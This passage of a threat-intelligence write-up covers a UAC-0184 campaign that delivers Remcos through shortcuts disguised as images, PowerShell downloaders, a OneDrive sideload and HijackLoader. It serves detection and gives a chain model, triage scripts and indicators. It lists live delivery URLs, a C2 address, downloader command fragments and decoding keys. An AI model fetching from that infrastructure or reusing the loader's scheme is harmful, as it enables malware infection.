"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_inputdll",
"role": "staging",
"role_confidence": "likely",
"techniques": []
},
{
"entity_id": "e_remcos",
"role": "payload",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_c2",
"role": "c2",
"role_confidence": "confirmed",
"techniques": []
}
],
"chain_id": "uac-0184-onedrive-sideload-remcos-2026-06",
"confidence": "confirmed",
"description": "Ukraine-themed archive containing document- and image-named LNK files. The shortcuts retrieve PowerShell downloaders from 144.31.236.240, which download and extract szch45clusterhum.zip, execute a OneDrive Patcher-based sideload chain, decode local pseudo-PNG IDAT containers through DWORD arithmetic and LZNT1, load a 35-module HijackLoader bundle and recover Remcos Agent 7.1.0 Pro configured for 144.31.236.240:27018.",
"entities": [
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_initial_zip",
"type": "file",
"value": "spisokszch.zip",
"x_sha256": "c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_readme",
"type": "file",
"value": "README.txt",
"x_language": "Ukrainian",
"x_lure_instruction": "Extract the files to the desktop and open them outside the archive",
"x_sha256": "86bac1444fef0b07eec10dcd4a5859a2296954f6b5a36690dc7c27e2931b9ccc"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_012",
"type": "file",
"value": "JPG_012.jpg.lnk",
"x_sha256": "bb40c9d8c217516a92a18a1bdb080a5af92cfafe81f6751dea665e3e78cb4851"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_013",
"type": "file",
"value": "JPG_013.jpg.lnk",
"x_sha256": "fe38e54bedee074825eb3fcbe4824ed203876692a424e0c183e0006b31d1b7a8"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_014",
"type": "file",
"value": "JPG_014.jpg.lnk",
"x_sha256": "a8d0a03543db29d279175c9679eba574dcb7a17e306195a68ab1d033ee2be01c"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_xlsx",
"type": "file",
"value": "spisokszch.xlsx.lnk",
"x_sha256": "6754f3854680767a394b22090f277fc53ec5a242faff54bf233084da5989c3ef"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_rite_url",
"type": "url",
"value": "http://144.31.236.240/szch45/ritecommunion.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_shout_url",
"type": "url",
"value": "http://144.31.236.240/szch45/shoutnewspaper.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_hint_url",
"type": "url",
"value": "http://144.31.236.240/szch45/hintprefix.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_collect_url",
"type": "url",
"value": "http://144.31.236.240/szch45/collectivisationgown.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_rite_ps1",
"type": "file",
"value": "ritecommunion.ps1",
"x_decoy": "JPG_012.jpg",
"x_sha256": "adf2c6f80229677615358b56f329aba9c3e9e009d9ca6d6deb0b805e6e212dbc"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_shout_ps1",
"type": "file",
"value": "shoutnewspaper.ps1",
"x_decoy": "JPG_013.jpg",
"x_sha256": "43579dd80314b6de4a1ca4e40b53ef0376a2ab55d50c8368e0b26af0af0d08c7"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_delivery_ip",
"type": "ip",
"value": "144.31.236.240",
"x_delivery_paths": [
"/szch45/ritecommunion.ps1",
"/szch45/shoutnewspaper.ps1",
"/szch45/hintprefix.ps1",
"/szch45/collectivisationgown.ps1",
"/szch45clusterhum.zip"
]
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_payload_zip_url",
"type": "url",
"value": "http://144.31.236.240/szch45clusterhum.zip"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_payload_zip",
"type": "file",
"value": "szch45clusterhum.zip",
"x_sha256": "fee96a66a8c143ff4f172963a56a813427a65dad7758834bb3283685a37df633"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_clusterhub",
"type": "file",
"value": "ClusterHub.exe",
"x_execution_path": "MSWinDistro/ClusterHub.exe",
"x_legitimate_software": "Microsoft OneDrive Patcher",
"x_sha256": "a11339f52a3b31d5a1f134e19bfc83d260ccbde4f14b14889bd824cc636c9a93"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_update",
"type": "file",
"value": "UpdateRingSettings.dll",
"x_role_note": "Sideloaded loader DLL",
"x_sha256": "da48273d7d4ab1d71ecf50fec0a58884ddb2baf18d872f25cab3637519ef71d7"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_logging",
"type": "file",
"value": "LoggingPlatform.dll",
"x_role_note": "Companion/forwarder DLL",
"x_sha256": "c0713fd808170f2204a9bc091288e358c5f3266bf99a44f3a36a7ccc03732bb1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_monitor",
"type": "file",
"value": "monitor_base.sym",
"x_decoder": "DWORD addition at offset 0x6BD8; decoded size 0x2084; key 0x3A12EA50"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_shellcode",
"type": "file",
"value": "monitor_base.sym decoded x64 shellcode",
"x_parser_marker": "????IDAT",
"x_size_bytes": 8324,
"x_stomping_library": "tapisrv.dll"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_physics",
"type": "file",
"value": "physicsdesc.map",
"x_first_idat_offset": "0x4052",
"x_format": "Noise prefix followed by 164 PNG-style IDAT chunks and IEND"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_idat_stream",
"type": "file",
"value": "physicsdesc.map concatenated IDAT stream",
"x_compressed_size": "0x145E3A",
"x_compression": "LZNT1",
"x_decompressed_size": "0x20AE58",
"x_dword_xor_key": "0x54EBEC5E",
"x_marker": "0xEA79A5C6"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_hijack_bundle",
"type": "file",
"value": "HijackLoader / IDATLoader modular bundle",
"x_module_count": 35,
"x_modules": [
"ti",
"ti64",
"rshell",
"rshell64",
"modUAC",
"modUAC64",
"modWD",
"modWD64",
"modTask",
"modTask64",
"modWriteFile",
"modWriteFile64",
"CUSTOMINJECT",
"PERSDATA"
]
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_inputdll",
"type": "file",
"value": "%windir%\\SysWOW64\\input.dll",
"x_role_note": "Configured module-stomping/deployment target also observed in the previous UAC-0184 sample"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_remcos",
"type": "file",
"value": "Remcos Agent 7.1.0 Pro",
"x_config_cipher": "RC4",
"x_config_resource": "SETTINGS",
"x_install_filename": "remcos.exe",
"x_mutex": "Rmc-X5JFP2",
"x_sha256": "40079f05ba7cdccac1f62f8e7e1b644bc0a806b58465f5c005725bc54ee73ef1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_c2",
"type": "ip",
"value": "144.31.236.240",
"x_port": 27018,
"x_protocol": "tcp",
"x_role_note": "Remcos C2 recovered from decrypted SETTINGS resource"
}
],
"iim_version": "1.1",
"name": "UAC-0184 LNK and PowerShell delivery to OneDrive sideload, HijackLoader and Remcos",
"needs_review": true,
"relations": [
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 1,
"to": "e_readme",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 2,
"to": "e_lnk_012",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 3,
"to": "e_lnk_013",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 4,
"to": "e_lnk_014",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_initial_zip",
"sequence_order": 5,
"to": "e_lnk_xlsx",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_lnk_012",
"sequence_order": 6,
"to": "e_ps1_rite_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_013",
"sequence_order": 7,
"to": "e_ps1_shout_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_014",
"sequence_order": 8,
"to": "e_ps1_hint_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_lnk_xlsx",
"sequence_order": 9,
"to": "e_ps1_collect_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_ps1_rite_url",
"sequence_order": 10,
"to": "e_rite_ps1",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_ps1_shout_url",
"sequence_order": 11,
"to": "e_shout_ps1",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_ps1_rite_url",
"sequence_order": 12,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_shout_url",
"sequence_order": 13,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_hint_url",
"sequence_order": 14,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_ps1_collect_url",
"sequence_order": 15,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_payload_zip_url",
"sequence_order": 16,
"to": "e_delivery_ip",
"type": "resolves-to"
},
{
"confidence": "confirmed",
"from": "e_rite_ps1",
"sequence_order": 17,
"to": "e_payload_zip_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_shout_ps1",
"sequence_order": 18,
"to": "e_payload_zip_url",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_payload_zip_url",
"sequence_order": 19,
"to": "e_payload_zip",
"type": "download"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 20,
"to": "e_clusterhub",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 21,
"to": "e_update",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 22,
"to": "e_logging",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 23,
"to": "e_monitor",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_payload_zip",
"sequence_order": 24,
"to": "e_physics",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_clusterhub",
"sequence_order": 25,
"to": "e_update",
"type": "execute"
},
{
"confidence": "likely",
"from": "e_update",
"sequence_order": 26,
"to": "e_logging",
"type": "execute"
},
{
"confidence": "confirmed",
"from": "e_update",
"sequence_order": 27,
"to": "e_monitor",
"type": "references"
},
{
"confidence": "confirmed",
"from": "e_monitor",
"sequence_order": 28,
"to": "e_shellcode",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_shellcode",
"sequence_order": 29,
"to": "e_physics",
"type": "references"
},
{
"confidence": "confirmed",
"from": "e_physics",
"sequence_order": 30,
"to": "e_idat_stream",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_idat_stream",
"sequence_order": 31,
"to": "e_hijack_bundle",
"type": "drops"
},
{
"confidence": "likely",
"from": "e_hijack_bundle",
"sequence_order": 32,
"to": "e_inputdll",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_hijack_bundle",
"sequence_order": 33,
"to": "e_remcos",
"type": "drops"
},
{
"confidence": "confirmed",
"from": "e_remcos",
"sequence_order": 34,
"to": "e_c2",
"type": "connect"
}
],
"title": "UAC-0184 LNK and PowerShell delivery to OneDrive sideload, HijackLoader and Remcos",
"x_evidence_url": "https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/",
"x_note": "Only ritecommunion.ps1 and shoutnewspaper.ps1 were available for direct inspection. hintprefix.ps1 and collectivisationgown.ps1 are confirmed as LNK-referenced URLs, but their bodies were not present in the analyzed set. Endpoint execution details are retained as chain context; IIM technique annotations are limited to applicable infrastructure/container properties."
}
You can test it in the IIM Workbench
The same IP is therefore visible at both the staging and C2 positions.
The chain does not show a separate redirector, domain or frontend service in the analyzed artifacts.
The IIM representation also highlights an important distinction:
144.31.236.240:80
is used for delivery while:
144.31.236.240:27018
is used by the final payload for command and control.
They are the same infrastructure entity performing different roles within the campaign flow.
Defensive observations
The strongest detections should focus on combinations of artifacts and behavior rather than one filename.
Initial archive and shortcut signals
Investigate archives containing apparent image or Office filenames that end in .lnk, especially when accompanied by instructions telling the user to extract them before opening.
The observed shortcut command lines combine:
cmd.exe /v /c
MSXML2.XMLHTTP
ADODB.Stream
cscript //b
powershell -NoP -W Hidden -ExecutionPolicy Bypass
The API names are reconstructed from smaller strings and the downloaded scripts are deleted after execution.
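As an added triage check (not part of the original analysis or any tool the post describes), the following Python scans an in-memory ZIP for the archive-level signals just listed: members whose names imitate an image or Office document but end in .lnk, confirmed by the ShellLink header, plus a README that tells the recipient to extract before opening. The sample archive, its member names and the README text are constructed from the page's description; the regexes and the `benign` variant are assumptions for illustration.

```python
import io
import re
import zipfile

# Start of a ShellLink header: HeaderSize 0x0000004C followed by LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian GUID layout.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
# Document-looking name that really ends in .lnk (e.g. JPG_012.jpg.lnk).
DISGUISED_LNK = re.compile(r"\.(jpe?g|png|gif|pdf|docx?|xlsx?|pptx?)\.lnk$", re.IGNORECASE)
# Wording that tells the recipient to extract before opening (Ukrainian or English).
EXTRACT_HINT = re.compile(r"розпак|витягн|extract", re.IGNORECASE)

def triage_archive(zip_bytes):
    """Flag an in-memory ZIP that carries disguised shortcuts and extraction instructions."""
    findings = {"disguised_lnk": [], "name_only_lnk": [], "extract_instruction": False}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            body = zf.read(info)
            if DISGUISED_LNK.search(name):
                # Confirm by content: a real shortcut, not just a suspicious name.
                if body.startswith(LNK_MAGIC):
                    findings["disguised_lnk"].append(name)
                else:
                    findings["name_only_lnk"].append(name)
            elif name.lower().endswith(".txt") and EXTRACT_HINT.search(body.decode("utf-8", "replace")):
                findings["extract_instruction"] = True
    findings["suspicious"] = bool(findings["disguised_lnk"])
    return findings

def build_sample_archive(benign=False):
    """Constructed ZIP mirroring the page's member names; shortcut bodies are header-only stubs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if benign:
            zf.writestr("JPG_012.jpg", b"\xff\xd8\xff" + b"\x00" * 64)  # JPEG SOI marker
            zf.writestr("README.txt", b"Holiday photos")
        else:
            for name in ("JPG_012.jpg.lnk", "JPG_013.jpg.lnk", "JPG_014.jpg.lnk", "spisokszch.xlsx.lnk"):
                zf.writestr(name, LNK_MAGIC + b"\x00" * 56)
            zf.writestr("README.txt", "Витягніть їх з архіву (розпакуйте) на робочий стіл".encode("utf-8"))
    return buf.getvalue()
```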
PowerShell staging signals
The recovered scripts:
- download szch45clusterhum.zip;
- create an MSWinDistro directory;
- extract the archive;
- execute MSWinDistro/ClusterHub.exe;
- open a matching JPG decoy.
The combination of an application-like extraction directory, OneDrive components and image decoys is unusual.
OneDrive sideload signals
Investigate OneDrive-related binaries running from:
Downloads
Desktop
%TEMP%
%APPDATA%
or from an archive-created directory such as:
MSWinDistro
The following local combination is particularly relevant:
ClusterHub.exe
UpdateRingSettings.dll
LoggingPlatform.dll
monitor_base.sym
physicsdesc.map
Container-level signals
The local payload containers can be detected structurally:
- large printable filler prefix;
- no valid PNG signature;
- repeated big-endian PNG chunk lengths;
- many consecutive IDAT chunks;
- final IEND;
- reconstructed data that becomes meaningful after DWORD XOR and LZNT1 decompression.
These properties are likely to survive filename and hash rotation.
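The following Python is an added example (not code from the original post) that turns the container-level signals above into a structural scan: it walks big-endian PNG chunk framing from an IDAT occurrence without requiring a PNG signature, counts the consecutive IDAT chunks, checks for the closing IEND and a printable prefix, and reassembles the IDAT stream. It also undoes the DWORD XOR with the 0x54EBEC5E key the analysis recovered for physicsdesc.map; the LZNT1 step that follows is not implemented here. The sample container, its noise prefix and the payload are constructed stand-ins, not the real file.

```python
import struct
import zlib
IDAT_XOR_KEY = 0x54EBEC5E            # DWORD XOR key the page recovers for physicsdesc.map
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def _png_chunk(ctype, data):
    """Frame data as a PNG chunk: big-endian length, type, data, CRC32."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def dword_xor(data, key):
    """XOR each little-endian DWORD with key; the page's step between IDAT reassembly and LZNT1."""
    padded = data + b"\x00" * (-len(data) % 4)
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)
    return struct.pack("<%dI" % len(words), *(w ^ key for w in words))

def build_sample_container(payload, chunk_size=64, prefix_len=0x400):
    """Constructed stand-in for physicsdesc.map: printable noise, no PNG signature,
    a run of IDAT chunks carrying the XORed stream, then a closing IEND."""
    prefix = bytes(0x21 + (i * 7) % 94 for i in range(prefix_len))
    stream = dword_xor(payload, IDAT_XOR_KEY)
    idats = b"".join(_png_chunk(b"IDAT", stream[i:i + chunk_size])
                     for i in range(0, len(stream), chunk_size))
    return prefix + idats + _png_chunk(b"IEND", b"")

def scan_idat_container(buf, min_chunks=8):
    """Walk PNG chunk framing from each IDAT occurrence and report the structural
    signals listed above. Returns None when no IDAT run of min_chunks exists."""
    pos = buf.find(b"IDAT", 4)
    while pos != -1:
        p, parts = pos - 4, []
        while p + 12 <= len(buf):
            length = struct.unpack(">I", buf[p:p + 4])[0]
            if buf[p + 4:p + 8] != b"IDAT" or p + 12 + length > len(buf):
                break
            parts.append(buf[p + 8:p + 8 + length])
            p += 12 + length
        if len(parts) >= min_chunks:
            prefix = buf[:pos - 4]
            return {
                "first_idat_offset": pos - 4,
                "idat_chunks": len(parts),
                "has_png_signature": buf.startswith(PNG_SIGNATURE),
                "printable_prefix": all(0x20 <= b < 0x7F for b in prefix),
                "iend_follows": buf[p + 4:p + 8] == b"IEND",
                "stream": b"".join(parts),      # still XORed; LZNT1 step not shown here
            }
        pos = buf.find(b"IDAT", pos + 1)
    return None
```

A real PNG with a valid signature and a few IDAT chunks will not trip this scan unless the IDAT count is high and the signature check is ignored, which is why the signals are meant to be combined.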
Network signals
Relevant observed endpoints are:
http://144.31.236[.]240/szch45/ritecommunion.ps1
http://144.31.236[.]240/szch45/shoutnewspaper.ps1
http://144.31.236[.]240/szch45/hintprefix.ps1
http://144.31.236[.]240/szch45/collectivisationgown.ps1
http://144.31.236[.]240/szch45clusterhum.zip
144.31.236[.]240:27018
Connections to the HTTP paths indicate delivery activity.
Connections to TCP port 27018 are associated with the recovered Remcos configuration.
Conclusion
The newly recovered initial artifacts complete the chain.
The campaign does not begin with ClusterHub.exe.
It begins with a Ukrainian-language archive containing four shortcuts disguised as images and a spreadsheet.
Those shortcuts construct a small VBScript downloader, retrieve PowerShell stages and delete the temporary files after execution. The PowerShell scripts download a second ZIP, extract a OneDrive-themed application package, start the sideload host and open a real decoy file.
From that point onward, the chain follows the same broad architecture documented in the previous UAC-0184 sample.
The actor changed the delivery mechanism:
- They replaced the Plane9 exterior with OneDrive
- They rotated the container names, keys, offsets and final payload
- They retained the core loading pipeline and even reused the internal %windir%\SysWOW64\input.dll path
The newest build also provides a much clearer endgame.
The modular HijackLoader bundle decodes Remcos Agent 7.1.0 Pro, configured to communicate with the same server that delivered the initial PowerShell stages and secondary archive:
144.31.236.240:27018
The exterior changed.
The loader skeleton remained.
And this time, the complete path from the first click to the final controller is visible.
Core indicators
Initial archive
spisokszch.zip
SHA-256:
c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af
JPG_012.jpg.lnk
SHA-256:
bb40c9d8c217516a92a18a1bdb080a5af92cfafe81f6751dea665e3e78cb4851
JPG_013.jpg.lnk
SHA-256:
fe38e54bedee074825eb3fcbe4824ed203876692a424e0c183e0006b31d1b7a8
JPG_014.jpg.lnk
SHA-256:
a8d0a03543db29d279175c9679eba574dcb7a17e306195a68ab1d033ee2be01c
spisokszch.xlsx.lnk
SHA-256:
6754f3854680767a394b22090f277fc53ec5a242faff54bf233084da5989c3ef
ritecommunion.ps1
SHA-256:
adf2c6f80229677615358b56f329aba9c3e9e009d9ca6d6deb0b805e6e212dbc
shoutnewspaper.ps1
SHA-256:
43579dd80314b6de4a1ca4e40b53ef0376a2ab55d50c8368e0b26af0af0d08c7
collectivisationgown.ps1
SHA-256:
95c8f0ac2e427a5637e554c60f649cab1fe55f649fe3aacde3c66fdc6491921b
hintprefix.ps1
SHA-256:
56b19b9f63a649e8cfb9a0e4bb73aac52fbc2265e9793a5b976221432d0ba77f
Secondary archive
szch45clusterhum.zip
SHA-256:
fee96a66a8c143ff4f172963a56a813427a65dad7758834bb3283685a37df633
ClusterHub.exe
SHA-256:
a11339f52a3b31d5a1f134e19bfc83d260ccbde4f14b14889bd824cc636c9a93
UpdateRingSettings.dll
SHA-256:
da48273d7d4ab1d71ecf50fec0a58884ddb2baf18d872f25cab3637519ef71d7
LoggingPlatform.dll
SHA-256:
c0713fd808170f2204a9bc091288e358c5f3266bf99a44f3a36a7ccc03732bb1
monitor_base.sym
SHA-256:
93621d3793198cb00c1a0450e8e3375d6c0de862a8449ab796c894062ae32612
physicsdesc.map
SHA-256:
ad17e13f05399f0c3a2b13505507a78d8c2dbe2850e507a2d78b9dfa2f5b5e9a
Decoded Remcos Agent
SHA-256:
40079f05ba7cdccac1f62f8e7e1b644bc0a806b58465f5c005725bc54ee73ef1
04_decompressed_hijackloader_bundle.bin
SHA-256:
4870337bcd6e3ba0d82ca6a42604c05f1885c87967d0dc120f699d2b19706247
Delivery and C2:
144.31.236.240
144.31.236.240:27018
Mutex:
Rmc-X5JFP2
Configured filename:
remcos.exe